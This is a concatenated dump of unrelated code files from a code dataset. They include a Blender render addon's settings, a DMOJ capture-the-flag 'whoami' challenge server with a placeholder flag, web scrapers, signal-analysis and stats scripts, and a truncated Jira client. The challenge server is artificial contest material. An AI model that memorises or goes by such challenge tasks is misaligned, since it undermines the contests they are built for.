\ndef set_external(self, context):\n \n batch_list = bpy.context.scene.renderplus.batch.jobs\n index = bpy.context.scene.renderplus.batch.index\n \n if batch_list[index].use_external:\n batch_list[index].scene = ''\n batch_list[index].camera = ''\n batch_list[index].world = ''\n batch_list[index].layer = ''\n else:\n batch_list[index].scene = context.scene.name\n \n \n\ndef is_batch_format_optional(format):\n \"\"\" Check if a file format is optional \"\"\"\n\n optional = (\n 'HDR',\n 'TIFF',\n 'EXR',\n 'MULTILAYER',\n 'MPEG',\n 'AVICODEC',\n 'QUICKTIME',\n 'CINEON',\n 'DPX',\n 'DDS')\n\n return (format in optional)\n\n\n\ndef generate_GPU_enum(self, context):\n \"\"\" Generate list of computing devices for ui \"\"\"\n \n items = [\n ('DEFAULT', 'Default', 'Don\\'t change computing device'),\n ('CPU', 'CPU', 'Render using the CPU')\n ]\n \n for i in range(prefs.batch_cuda_devices):\n items.append(('CUDA_' + str(i), \n 'GPU #' + str(i+1), \n 'Use this GPU to render'))\n \n return items\n\n# ------------------------------------------------------------------------------\n# CLASSES\n\n\nclass RP_CustomOverride(bpy.types.PropertyGroup):\n\n \"\"\" Custom overrides for a render job \"\"\"\n\n path = StringProperty(\n name='Datapath',\n description='Datapath to property',\n default='')\n\n data = StringProperty(\n name='Data',\n description='Data to use',\n default='')\n \n name = StringProperty(\n name='Name',\n description='Override Name',\n default='New Custom Override')\n \n enabled = BoolProperty(\n name='Enabled',\n description='Enable this override',\n default = True,)\n\n\nclass RP_RenderJob(bpy.types.PropertyGroup):\n\n \"\"\" Render job to put in queue \"\"\"\n\n # --------------------------------------------------------------------------\n # BASIC PROPS\n\n name = StringProperty(\n name='Name',\n description='A name to identify this job in the queue',\n default='Untitled Render Job',\n set=set_job_name,\n get=get_job_name)\n\n scene = StringProperty(\n name='Scene',\n description='Scene to render',\n default='',\n update=fill_job_from_scene)\n\n camera = StringProperty(\n name='Camera',\n description='Camera to use in this render',\n default='')\n\n world = StringProperty(\n name='World',\n description='World to use in this render',\n default='')\n\n layer = StringProperty(\n name='Render Layer',\n description='Use only this render layer',\n default='')\n\n enabled = BoolProperty(\n name='Enable this render job',\n description='Process this render job',\n default=True)\n\n # --------------------------------------------------------------------------\n # EXTERNAL BLEND\n # --------------------------------------------------------------------------\n\n use_external = BoolProperty(\n name='Use external blendfile',\n description='Use a external blend file for this job',\n default=False,\n update=set_external)\n\n blend_file = StringProperty(\n name='Blend File',\n description='Path to external blendfile',\n subtype='FILE_PATH',\n default='')\n\n # --------------------------------------------------------------------------\n # FRAMES AND ANIMATION\n # --------------------------------------------------------------------------\n\n animation = BoolProperty(\n name='Animation',\n description='Render an animation instead of a still image',\n default=False)\n\n frame_custom = BoolProperty(\n name='Custom Frame',\n description='Use a custom frame or frame range for this render',\n default=False)\n\n frame_still = IntProperty(\n name='Frame',\n description='Frame to render',\n default=0)\n\n frame_start = IntProperty(\n name='Start Frame',\n description='First frame of the animation range',\n default=0)\n\n frame_end = IntProperty(\n name='End Frame',\n description='Final frame of the animation range',\n default=250)\n\n # --------------------------------------------------------------------------\n # OUTPUT\n # --------------------------------------------------------------------------\n\n output = StringProperty(\n name='Output',\n description='Filename to output to',\n subtype='FILE_PATH',\n default='')\n\n use_custom_format = BoolProperty(\n name='Custom File Format',\n description='Use a specific file format for this render job',\n default=False,\n )\n\n format = EnumProperty(\n name='Format',\n description='Format to use in the render job',\n items=(('TGA', 'Targa', ''),\n ('IRIS', 'Iris', ''),\n ('JPEG', 'Jpeg', ''),\n ('MOVIE', 'Movie', ''),\n ('RAWTGA', 'Raw Targa', ''),\n ('AVIRAW', 'Raw AVI', ''),\n ('AVIJPEG', 'Jpeg AVI', ''),\n ('PNG', 'PNG', ''),\n ('BMP', 'BMP', ''),\n ('HDR', 'Radiance HDR', ''),\n ('TIFF', 'TIFF', ''),\n ('EXR', 'OpenEXR', ''),\n ('MULTILAYER', 'OpenEXR Multilayer', ''),\n ('MPEG', 'MPEG', ''),\n ('QUICKTIME', 'Quicktime', ''),\n ('CINEON', 'Cineon', ''),\n ('DPX', 'DPX', ''),\n ('DDS', 'DDS', ''),\n ),\n default='PNG',\n )\n \n cycles_samples = IntProperty(\n name='Samples',\n description=('Samples to render. Set to 0 to use'\n ' the value set in the scene'),\n default=0,\n min=0,\n max=10000)\n\n threads = IntProperty(\n name='Threads',\n description='Threads to use while rendering',\n default=0,\n min=0,\n max=64)\n\n # --------------------------------------------------------------------------\n # RENDER SIZE\n # --------------------------------------------------------------------------\n\n size_custom = BoolProperty(\n name='Custom Size',\n description='Use a custom render size for this job',\n default=False)\n\n size_x = IntProperty(\n name='Width',\n description='Custom render width for this job',\n default=1920,\n min=4)\n\n size_y = IntProperty(\n name='Height',\n description='Custom render height for this job',\n default=1080,\n min=4)\n\n\n use_section = BoolProperty(\n name='Render section',\n description = 'Render only a section of the image',\n default= False,)\n\n section_x = FloatProperty(\n name='X',\n description='Starting X coordinate for section render',\n default=0,\n min=0,\n max=0.99,)\n \n section_y = FloatProperty(\n name='Y',\n description='Starting Y coordinate for section render',\n default=0,\n min=0,\n max=0.99,)\n \n section_width = FloatProperty(\n name='Width',\n description='Width for section render',\n default=1,\n min=0.01,\n max=1,)\n \n section_height = FloatProperty(\n name='Height',\n description='Height for section render',\n default=1,\n min=0.01,\n max=1,)\n \n device = EnumProperty(\n name='Compute Device',\n description='Compute device to render with',\n items=generate_GPU_enum)\n\n # --------------------------------------------------------------------------\n # CUSTOM OVERIDES\n # --------------------------------------------------------------------------\n\n custom_overrides = CollectionProperty(type=RP_CustomOverride)\n \n custom_overrides_index = IntProperty(\n name='Index of current custom override',\n default=0)\n\n\n# ------------------------------------------------------------------------------\n# RENDER SLOTS\n# ------------------------------------------------------------------------------\n\nclass RP_RenderSlot(bpy.types.PropertyGroup):\n\n \"\"\" Customizable render slots \"\"\"\n\n identifier = IntProperty(\n name='ID',\n description='Int to identify this slot',\n default=0,\n min=0,\n max=8\n )\n\n name = StringProperty(\n name='Name',\n description='A name to identify this slot',\n default='Slot',\n )\n\n is_used = BoolProperty(\n name='Slot is used',\n description='True if this slot has been used for render',\n default=False)\n\n\n# ------------------------------------------------------------------------------\n# STATS\n# ------------------------------------------------------------------------------\nclass RP_StatsData(bpy.types.PropertyGroup):\n\n \"\"\" Stats data \"\"\"\n\n average = FloatProperty(\n name='Average frame rendertime',\n description='Averaged rendertime for all frames',\n default=0)\n\n slowest = FloatVectorProperty(\n name='Slowest frame rendertime',\n description='Highest rendertime for all frames',\n size=2,\n default=(0, 0))\n\n fastest = FloatVectorProperty(\n name='Fastest frame rendertime',\n description='Smallest rendertime of all frames',\n size=2,\n default=(0, 0))\n\n remaining = FloatProperty(\n name='Time remaining to complete animation',\n description='Estimation of how long rendering will take',\n default=0)\n\n total = FloatProperty(\n name='Total rendertime',\n description='Time it took to render the last animation',\n default=-1)\n\n ui_toggle = BoolProperty(\n name='Show time stats',\n description='Show more stats about render time',\n default=False)\n\n save_file = BoolProperty(\n name='Save stats to a file',\n description='Save the stats to a CSV file',\n default=False)\n\n\n# ------------------------------------------------------------------------------\n# BATCH\n# ------------------------------------------------------------------------------\nclass RP_BatchSettings(bpy.types.PropertyGroup):\n\n \"\"\" Batch Data \"\"\"\n\n jobs = CollectionProperty(type=RP_RenderJob)\n\n index = IntProperty(\n name='Index of current render job in list',\n default=0)\n\n # Batch Renders Settings -----------------------------\n rss_path = StringProperty(\n name='RSS file',\n description='Filepath to write batch RSS file to',\n default='//feed.rss',\n subtype='FILE_PATH'\n )\n\n use_rss = BoolProperty(\n name='Write RSS file',\n description='Generate a RSS file to monitor batch process',\n default=False)\n\n write_logs = BoolProperty(\n name='Write log files',\n description='Write log files for each render job',\n default=False)\n\n use_global_size = BoolProperty(\n name='Global size',\n description='Override size for all render jobs',\n default=False)\n\n global_size_x = IntProperty(\n name='Width',\n description='Custom render width for all jobs',\n default=1920,\n min=4)\n\n global_size_y = IntProperty(\n name='Height',\n description='Custom render height for all jobs',\n default=1080,\n min=4)\n\n use_global_percentage = BoolProperty(\n name='Global Percentage',\n description='Override size percentage for all jobs',\n default=True)\n\n global_percentage = FloatProperty(\n name='Percentage',\n description='Custom size percentage for all jobs',\n subtype='PERCENTAGE',\n precision=0,\n min=1,\n max=100,\n default=100)\n\n ignore_border = BoolProperty(\n name='Ignore render border',\n description='Ignore render border for batch',\n default=False)\n \n use_term = BoolProperty( \n name='Use terminal',\n description='Run the batch inside a terminal',\n default=False,)\n\n use_rplus_settings = BoolProperty( \n name='Use Render+ Settings',\n description='Use notification, poweroff and post/pre actions in batch',\n default=False,)\n\n # Batch Renders UI \n # --------------------------------------------------------------------------\n ui_job_tab = EnumProperty(\n name='Tab for render job overrides',\n description='Current tab for render job overrides',\n items=(('SCENE', 'Scene', 'Scene related overrides'),\n ('RENDER', 'Render', 'Rendering related overrides'),\n ('CUSTOM', 'Custom', 'Custom Overrides')),\n default='SCENE')\n\n\n# ------------------------------------------------------------------------------\n# ACTION\n# ------------------------------------------------------------------------------\n\nclass RP_ActionSettings(bpy.types.PropertyGroup):\n\n \"\"\" Settings for pre/post actions \"\"\"\n\n option = EnumProperty(\n name='Option',\n description='Options to run this action',\n items=(('command', 'Command', 'Run a command'),\n ('script', 'Script', 'Run a Python script')),\n default='command')\n\n command = StringProperty(\n name='Command',\n description='Command to execute',\n default='')\n\n script = StringProperty(\n name='Script',\n description='Script to run',\n default='')\n\n\n# ------------------------------------------------------------------------------\n# SETTINGS\n# ------------------------------------------------------------------------------\n\n\nclass RP_Settings(bpy.types.PropertyGroup):\n\n \"\"\" Settings and UI States for R+ \"\"\"\n\n off_options = EnumProperty(\n name='Power Off',\n description='Power off when rendering is finished',\n items=(('DISABLED', 'Disabled', 'Let the computer on'),\n ('SLEEP', 'Sleep', 'Set computer to sleep'),\n ('OFF', 'Shut down', 'Turn off computer')),\n default='DISABLED')\n\n\n notifications_desktop = BoolProperty(\n name='Desktop Notifications',\n description='Notify me using the Desktop',\n default=False)\n\n notifications_sound = BoolProperty(\n name='Sound',\n description='Notify me using Sound',\n default=False)\n\n notifications_mail = BoolProperty(\n name='Email',\n description='Send an email to notify me',\n default=False)\n\n opengl_transparent = BoolProperty(\n name='Transparent',\n description='Make background transparent',\n default=False)\n \n opengl_use_viewport = BoolProperty(\n name='Render Viewport',\n description='Render the entire viewport (including invisible objects)',\n default=False)\n \n opengl_percentage = FloatProperty(\n name='Size Percentage',\n description='Custom size percentage OpenGL renders',\n subtype='PERCENTAGE',\n precision=0,\n min=1,\n max=100,\n default=100)\n \n autosave = BoolProperty(\n name='Autosave image renders',\n description=('Save image renders automatically to the folder in the'\n 'output panel'),\n default=False)\n\n stats = PointerProperty(type=RP_StatsData)\n\n batch = PointerProperty(type=RP_BatchSettings)\n \n batch_ops = PointerProperty(type=RP_Batch_Ops)\n\n # Render Slots \n # --------------------------------------------------------------------------\n slots = CollectionProperty(type=RP_RenderSlot)\n\n active_slot = IntProperty(\n name='Index of active slot',\n default=0,\n min=0,\n max=8)\n\n # Post-render settings \n # --------------------------------------------------------------------------\n post_enabled = BoolProperty(\n name='Post Render Toggle',\n description='Enable/Disable post render actions',\n default=False)\n\n post_settings = PointerProperty(type=RP_ActionSettings)\n\n # Pre-render settings \n # --------------------------------------------------------------------------\n pre_enabled = BoolProperty(\n name='Pre Render Toggle',\n description='Enable/Disable Pre render actions',\n default=False)\n\n pre_settings = PointerProperty(type=RP_ActionSettings)\n","sub_path":"All_In_One/addons/renderplus/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":32589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"499950039","text":"from bs4 import BeautifulSoup\nfrom gevent.pywsgi import WSGIServer\nfrom flask import Flask, request, send_from_directory\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\nimport requests\n\nflag = 'ctf{00000000000000000000000000000000}'\n\napp = Flask(__name__)\n\nlimiter = Limiter(\n\tapp,\n\tkey_func=get_remote_address,\n)\n\n# please test this locally so this challenge doesn't get cloudflare'd\n@app.route('/whoami', methods=['POST'])\n@limiter.limit('5 per minute') \ndef whoami():\n\ttoken = request.form.get('token', None)\n\tif token == None or not 1 < len(token) < 60:\n\t\tprint(\"bad\", token)\n\t\treturn 'invalid token'\n\n\ttoken = request.form['token']\n\tres = requests.get('https://dmoj.ca/user', headers={\n\t\t'Authorization': 'Bearer ' + token\n\t})\n\n\tif not res.ok:\n\t\tprint(\"wrong\", token)\n\t\treturn 'invalid token'\n\n\tdom = BeautifulSoup(res.text, features='html.parser')\n\tuser = dom.select_one('#user-links b')\n\n\tif user == None:\n\t\tprint(\"no user\", token)\n\t\treturn 'invalid token'\n\n\tif user.text == 'flag': # https://dmoj.ca/user/flag\n\t\treturn flag\n\n\treturn user.text\n\n\n@app.route('/')\ndef index():\n\treturn send_from_directory('', 'index.html')\n\nWSGIServer(('0.0.0.0', 5001), app).serve_forever()","sub_path":"DMOJCTF/2021/web/whoami/75fc429d78629963b3bea4a8dc6823a45ba39cc8.whoami/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"509421751","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests, json\r\nimport openpyxl\r\n\r\nmy_path = \"C:/Python/Documents/KFC_Indonesia.xlsx\"\r\nwb_obj_w = openpyxl.load_workbook(my_path)\r\nsheet_obj_w = wb_obj_w.active\r\n\r\n\r\nclass OBJ:\r\n Title = \"\"\r\n Address = \"\"\r\n FullAddress = \"\"\r\n Suburb = \"\"\r\n State = \"\"\r\n City = \"\"\r\n Country = \"\"\r\n Postcode = \"\"\r\n Latitude = \"\"\r\n Longitude = \"\"\r\n\r\nlistOBJ = []\r\nobj = OBJ()\r\nlistOBJ.append(obj)\r\n\r\nfor i in range(1, 123+1):\r\n print(i)\r\n # URL = 'https://agents.helloworld.com.au/search-location/' + str(postcode_sheet_obj.cell(row=i, column=1).value)\r\n URL = 'https://kfcku.com/api/stores?page='+str(i)\r\n res = requests.get(URL)\r\n # res = requests.get(URL)\r\n # print(res.text)\r\n if res.status_code == 200:\r\n output = res.text\r\n print(output)\r\n\r\n if len(output['data']) > 0:\r\n for store in output['data']:\r\n\r\n try:\r\n\r\n obj = OBJ()\r\n # print(store['ContactInfo']['FullAddress'])\r\n obj.Title = str(store['name'])\r\n obj.Address = str(store['address'])\r\n obj.Latitude = str(store['long'])\r\n obj.Longitude = str(store['lat'])\r\n\r\n print(obj.Title + \"|\" + str(obj.Latitude) + \" | \" + str(\r\n obj.Longitude))\r\n\r\n result = False\r\n\r\n if len(listOBJ) > 0:\r\n for i in range(len(listOBJ)):\r\n # print(str(obj.Title) + \" \" + str(listOBJ[z].Title))\r\n if (str(\r\n obj.Latitude) == str(listOBJ[i].Latitude) and str(obj.Longitude) == str(\r\n listOBJ[i].Longitude)):\r\n result = True\r\n break\r\n\r\n if result == False:\r\n listOBJ.append(obj)\r\n except:\r\n continue\r\n\r\nj=0\r\nprint(len(listOBJ))\r\nfor z in range(len(listOBJ)):\r\n j = j + 1\r\n print(listOBJ[z].Title +\" \"+ str(listOBJ[z].Latitude) +\" \"+ str(listOBJ[z].Longitude))\r\n sheet_obj_w.cell(row = j, column = 1).value = str(listOBJ[z].Title)\r\n sheet_obj_w.cell(row = j, column = 2).value = str(listOBJ[z].Address)\r\n # sheet_obj_w.cell(row = j, column = 3).value = str(listOBJ[z].Suburb)\r\n # sheet_obj_w.cell(row = j, column = 4).value = str(listOBJ[z].State)\r\n # sheet_obj_w.cell(row = j, column = 5).value = str(listOBJ[z].Country)\r\n # sheet_obj_w.cell(row = j, column = 6).value = str(listOBJ[z].Postcode)\r\n sheet_obj_w.cell(row = j, column = 7).value = str(str(listOBJ[z].Latitude))\r\n sheet_obj_w.cell(row = j, column = 8).value = str(str(listOBJ[z].Longitude))\r\n # wb_obj_w.save(\"C:/Python/Documents/KFC_Indonesia.xlsx\")\r\n","sub_path":"KFC (Indonesia).py","file_name":"KFC (Indonesia).py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"325842165","text":"from scipy.signal import chirp, sweep_poly, spectrogram, welch\nfrom scipy.special import factorial\nimport scipy.signal as signal\nimport numpy as np\nimport random\n\nimport rftool.radar as radar\nimport rftool.utility as util\nimport rftool.estimation as estimate\nimport rftool.communications as comm\nfrom utility import *\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nimport pickle\n#import os\n\nDebug = False\n\nFs = np.intc(802e3) # Receiver sample rate. #! Must be the same as the signals\nT = np.float(6e-3) # Pulse duration. #! Must be the same as the signals\nnIterations = 500\npacketSize = 32\n\n# Load alpha window function a-priori\npath = '../jobs/'\nfilename = 'SCD_GMM'\ndestination = path + filename + '.pkl'\nwith open(destination,'rb') as f:\n alphaWindow = pickle.load(f)\n\n# Plot results\nimport matplotlib.pyplot as plt\nplt.style.use('masterThesis')\nimport matplotlib\nimagePath = '../figures/symRateEst/'\n\nif Debug==False:\n mpl.use(\"pgf\")\n mpl.rcParams.update({\n \"pgf.texsystem\": \"lualatex\",\n 'font.family': 'serif',\n 'text.usetex': True,\n 'pgf.rcfonts': False,\n })\n\n\n# Compare the method of \ndef symbolrateAutocorr(sig, Fs, **kwargs):\n Rxx = np.abs(signal.correlate(sig, sig, mode='full', method='fft'))\n f0 = estimate.f0MleTime(Rxx=Rxx, f=Fs, peaks=5)\n return f0\n\n# Wrapper for estimation function \ndef symbolRateEstimator(sig, Fs, aPrioriFCenter=False, **kwargs):\n # Ensure that the true center frequency is only used in the intended case\n if aPrioriFCenter==False:\n kwargs.pop('fCenterPriori') # removes fCenterPriori from kwargs library\n\n SCD, f, alpha = estimate.FAM(sig, Fs = Fs, plot=False, method='conj', scale='linear', **kwargs)\n fCenter, R_symb = estimate.cyclicEstimator( SCD, f, alpha, **kwargs)\n return R_symb\n\n# Configure estimators\nestimators = []\nestimators.append(estimator('Autocorrelation MLE', symbolrateAutocorr, Fs=Fs))\nestimators.append(estimator('Cyclic MLE Method', symbolRateEstimator, Fs=Fs))\nestimators.append(estimator('Cyclic MLE Method, Full BW', symbolRateEstimator, Fs=Fs, bandLimited=False))\nestimators.append(estimator('Cyclic MLE A-Priori $f_c$', symbolRateEstimator, aPrioriFCenter=True, Fs=Fs))\nestimators.append(estimator('Cyclic MLE A-Priori $f_c$, $\\Omega$', symbolRateEstimator, aPrioriFCenter=True, Fs=Fs, alphaWindow=alphaWindow, fWindow='triangle', fWindowWidthHertz=50e3))\n\n# Create analysis object\nm_analysis = analysis('Symbol_Rate_Estimation', estimators=estimators, lossFcn='MAE')\n\n# Generate Eb/N0 range for statistics gathering.\nEbN0Start = 40\nEbN0End = 10\n\nm_analysis.axis.displayName = '$E_b/N_0$ [dB]'\nm_analysis.axis.displayVector = np.linspace(EbN0End, EbN0Start, EbN0Start-EbN0End+1)\nm_analysis.axis.name = 'S/N [dB]'\nm_analysis.axis.vector = comm.EbN0toSNRdB(m_analysis.axis.displayVector, 2, Fs, 1/T)\nm_analysis.analyze(iterations=nIterations, parameter='symbolRate', packetSize=packetSize, debug=Debug)\n\n# Write to binary file\npath = '../jobs/'\njobname = 'SRateJob'\ndestination = path + jobname + str(m_analysis.iterations) + '.pkl'\n# Save job to binary file\nwith open(destination,'wb') as f:\n pickle.dump(m_analysis, f)\n\niterations = nIterations #! Must be same as job file\n\"\"\"\n# Read from binary file\npath = '../jobs/'\njobname = 'SRateJob'\ndestination = path + jobname + str(iterations) + '.pkl'\nwith open(destination,'rb') as f:\n m_analysis = pickle.load(f)\"\"\"\n\nfig, ax = m_analysis.plotResults(pgf=not Debug, scale='semilogy', plotYlabel='MAE [Hz]')\nax.legend(loc='upper right')\n#fig.set_figheight(2.5)\nplt.tight_layout()\n\n\nif Debug == False:\n fileName = m_analysis.name +'_'+ str(iterations) + '_iterations' # str(m_analysis.iterations)\n plt.savefig(imagePath + fileName + '.png', bbox_inches='tight')\n plt.savefig(imagePath + fileName + '.pgf', bbox_inches='tight')\n\nplt.show()","sub_path":"ChirpAnalyzer/multiAnlayzeSymbolRate.py","file_name":"multiAnlayzeSymbolRate.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"246245616","text":"from classes.recruit_classes import *\nfrom classes.note_class import Note\n\n\nclass MagicView:\n def __init__(self):\n self.recruitable_talent = [Cadre()]\n self.recruitable_erelyk = [Cadre()]\n\n self.talent_cadres = [Cadre()]\n self.erelyk_cadres = [Cadre()]\n\n self.notes = [Note()]\n\n def encode(self):\n result = dict(self.__dict__)\n\n result['recruitable_talent'] = [cadre.encode() for cadre in self.recruitable_talent]\n result['recruitable_erelyk'] = [cadre.encode() for cadre in self.recruitable_erelyk]\n result['talent_cadres'] = [cadre.encode() for cadre in self.talent_cadres]\n result['erelyk_cadres'] = [cadre.encode() for cadre in self.erelyk_cadres]\n result['notes'] = [note.encode() for note in self.notes]\n\n\n return result\n\n def decode(self, code):\n self.__dict__ = dict(code)\n self.recruitable_talent = [Cadre().decode(cadre) for cadre in code['recruitable_talent']]\n self.recruitable_erelyk = [Cadre().decode(cadre) for cadre in code['recruitable_erelyk']]\n self.talent_cadres = [Cadre().decode(cadre) for cadre in code['talent_cadres']]\n self.erelyk_cadres = [Cadre().decode(cadre) for cadre in code['erelyk_cadres']]\n self.notes = [Note().decode(note) for note in code['notes']]\n\n return self\n\nclass Cadre(Recruit):\n def __init__(self):\n super(Cadre, self).__init__()\n self.level = 0\n self.art = \"None\" # Maybe enum ?\n\n def encode(self):\n return super(Cadre, self).encode()\n\n def decode(self, code):\n return super(Cadre, self).decode(code)\n","sub_path":"classes/magic_classes.py","file_name":"magic_classes.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"614275858","text":"from tkinter import filedialog\nfrom helpers import read_edf,save_pdf,read_wav,save_wav\nimport threading\nimport re\n\nclass File_Explorer():\n \"\"\"\n Show the native file dialog for opening and saving files.\n \"\"\"\n @staticmethod\n def save_file(root):\n \"\"\"\n Save a PDF file on another thread.\n \"\"\"\n filename = filedialog.asksaveasfilename(initialdir = \"/\",\n title = \"Save a File\",\n defaultextension=\"*.pdf\",\n filetypes = ((\"PDF files\",\n \"*.pdf\"),\n (\"WAV files\",\n \"*.wav\"),\n (\"all files\",\n \"*.*\"))) or \"\"\n if re.search(\".wav\\Z\",filename) is not None:\n threading.Thread(target=save_wav,args=(filename,root.signal[\"Fs\"],root.signal[\"samples\"])).run()\n elif re.search(\".pdf\\Z\",filename) is not None:\n threading.Thread(target=save_pdf,args=(filename,root.viewers[1].signal,root.viewers[1].time,root.viewers[1].equalized_samples)).run()\n else:\n return None\n\n\n @staticmethod\n def open_file(root):\n \"\"\"\n Read data from EDF file and generate a Fileupload event.\n \"\"\"\n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"EDF files\",\n \"*.edf*\"),\n (\"WAV files\",\n \"*.wav\"),\n (\"all files\",\n \"*.*\"))) or \"\"\n \n if re.search(\".wav\\Z\",filename) is not None:\n root.new_signal = read_wav(filename)\n root.event_generate(\"<>\")\n elif re.search(\".edf\\Z\",filename) is not None:\n root.new_signal = read_edf(filename)\n root.event_generate(\"<>\")\n else:\n return None","sub_path":"file_explorer.py","file_name":"file_explorer.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"464235679","text":"#!/usr/bin/python3\n\nimport sys\nfrom launchpadlib.launchpad import Launchpad\n\n\"\"\"\nPPAOWNER = sys.argv[1]\nPPA = sys.argv[2]\nversion = sys.argv[3]\narch = sys.argv[4]\n\"\"\"\n# version = \"xenial\"\n# arch = \"amd64\"\n# \"Pending\", \"Published\", \"Superseded\", \"Deleted\", \"Obsolete\"\n# status = 'Superseded'\n# status = \"Published\"\n# desired_dist_and_arch = 'https://api.launchpad.net/beta/ubuntu/' + version + '/' + arch\nsince = '2018-09-01'\nif len(sys.argv) > 1:\n since = sys.argv[1]\n\n\ndef produce(PPAOWNER, PPA):\n cachedir = \"~/.launchpadlib/cache/\"\n lp_ = Launchpad.login_anonymously('ppastats', 'production', cachedir)\n owner = lp_.people[PPAOWNER]\n for ppa in PPA:\n archive = owner.getPPAByName(name=ppa)\n for individualarchive in archive.getPublishedBinaries(created_since_date=since, ordered=False):\n # Optional filters\n # status=status\n # , distro_arch_series=desired_dist_and_arch\n # print individualarchive\n # if individualarchive.binary_package_name == 'kicad':\n downloads = individualarchive.getDailyDownloadTotals()\n for dt in downloads:\n # print dt\n # getDailyDownloadTotals())#getDownloadCount())\n short_version = individualarchive.binary_package_version\n short_version = short_version.split(\"+\")[0]\n short_version = short_version.split(\"-\")[0]\n\n print('\"' + PPAOWNER+\"/\"+ppa + '\",\"' + dt + '\",\"' + str(individualarchive.date_published) + '\",\"' + str(individualarchive.status) + '\",\"' + individualarchive.distro_arch_series.architecture_tag +\n '\",\"' + individualarchive.distro_arch_series.distroseries.name + '\",\"' + individualarchive.binary_package_name + '\",\"' + individualarchive.binary_package_version + '\",' + str(downloads[dt]) + ',\"'+short_version+'\"')\n# print individualarchive.getDailyDownloadTotals()\n\n\n#PPAOWNER = \"js-reynaud\"\n#PPA = [\"kicad-5\", \"ppa-kicad\", \"kicad-dev-nightly\", \"kicad-4\", \"kicad-5.1\"]\nprint(\"PPA,Date,Date published,Status,Arch,Ubuntu version,Package name,Package version,Download count,Short version\")\nproduce(\"js-reynaud\", [\"kicad-5\", \"ppa-kicad\", \"kicad-dev-nightly\", \"kicad-4\"])\nproduce(\"kicad\", [\"kicad-dev-nightly\", \"kicad-5.1-releases\", \"kicad-6.0-releases\", \"kicad-7.0-releases\", \"kicad-7.0-nightly\"])\n","sub_path":"stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"79368021","text":"__author__ = \"Narwhale\"\n\nfrom core import auth\n\n# user_data = {\n# 'account_id':None,\n# 'is_authenticated':False,\n# 'account_data':None\n# }\ndef interactive():\n '''\n 此函数为与客户的交互模块,打印选项供客户选择。\n :return:\n '''\n print('你好!')\n\n\n\ndef run():\n '''\n 这个函数主要执行运登录程序以及执行与客户的交互\n :return:\n '''\n select = '''\n--------选项---------\n 1.登录\n 2.注册\n '''\n print(select)\n user_select = input('请输入你的选择:')\n selsct_dict = {'1':'auth.acc_login()','2':'auth.acc_enroll()'}\n if user_select in selsct_dict:\n acc_data = eval(selsct_dict[user_select])\n if acc_data:\n interactive()\n else:\n print('超出选项')\n","sub_path":"编程/项目练习/ATM/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"63215145","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.2 (3180)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-armv6l/egg/barobo/demo/with_AutoConnect/setMotorPower2.py\n# Compiled at: 2014-09-16 14:39:13\nfrom barobo import Linkbot, Dongle\nimport time, sys, math\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('Usage: {0} [Linkbot Serial ID]'.format(sys.argv[0]))\n quit()\n serialID = sys.argv[1]\n dongle = Dongle()\n dongle.connect()\n linkbot = dongle.getLinkbot(serialID)\n for i in range(0, 1000, 1):\n linkbot.setBuzzerFrequency(int((math.sin(i / 100) + 1) * 1000))\n\n linkbot.stop()","sub_path":"pycfiles/PyBarobo-0.1.18-py3.2-linux-armv6l/setMotorPower2.cpython-32.py","file_name":"setMotorPower2.cpython-32.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"540549804","text":"import requests\nimport json\nfrom jira_exception_handler import JiraExceptionHandler\nfrom jira_logger import JiraLogger\n\nclass JiraIssue:\n \n def __init__(self, jira_instance):\n '''\n retrieves createMeta fields\n retrieves editMeta fields\n '''\n self._jira_instance = jira_instance\n self._base_url = self._jira_instance.url\n self._create_fields = self._create_meta()\n self._edit_fields = self._edit_meta()\n self._jira_logger = JiraLogger()\n self._exception_handler = JiraExceptionHandler()\n \n \n def _create_meta(self, project_ids=None, project_keys=None, issue_type_ids=None, issue_type_names=None):\n '''\n retrieves self._create_fields from /rest/api/2/issue/createmeta\n '''\n create_meta_url = '/rest/api/2/issue/createmeta'\n request_data = {}\n if project_ids:\n request_data['projectIds'] = project_ids\n if project_keys:\n request_data['projectKeys'] = project_keys\n if issue_type_ids:\n request_data['issuetypeIds'] = issue_type_ids\n if issue_type_names:\n request_data['issuetypeNames'] = issue_type_names\n resource_url = \"%s/%s\"%(self._base_url, create_meta_url)\n request_json = json.dumps(request_data)\n response = requests.get(resource_url, request_json)\n status = response.status_code\n text = response.text\n self._jira_logger.log(status, text, request_json)\n if status != 200:\n self._exception_handler.raise_exception(status, text, request_json) \n return response.json\n \n \n def _edit_meta(self, issue_key):\n '''\n retrieves self._create_fields from /rest/api/2/issue/createmeta\n '''\n edit_meta_url = '/rest/api/2/issue/editmeta'\n request_data = dict(issueIdOrKey=issue_key)\n resource_url = \"%s/%s\"%(self._base_url, edit_meta_url)\n request_json = json.dumps(request_data)\n response = requests.get(resource_url, 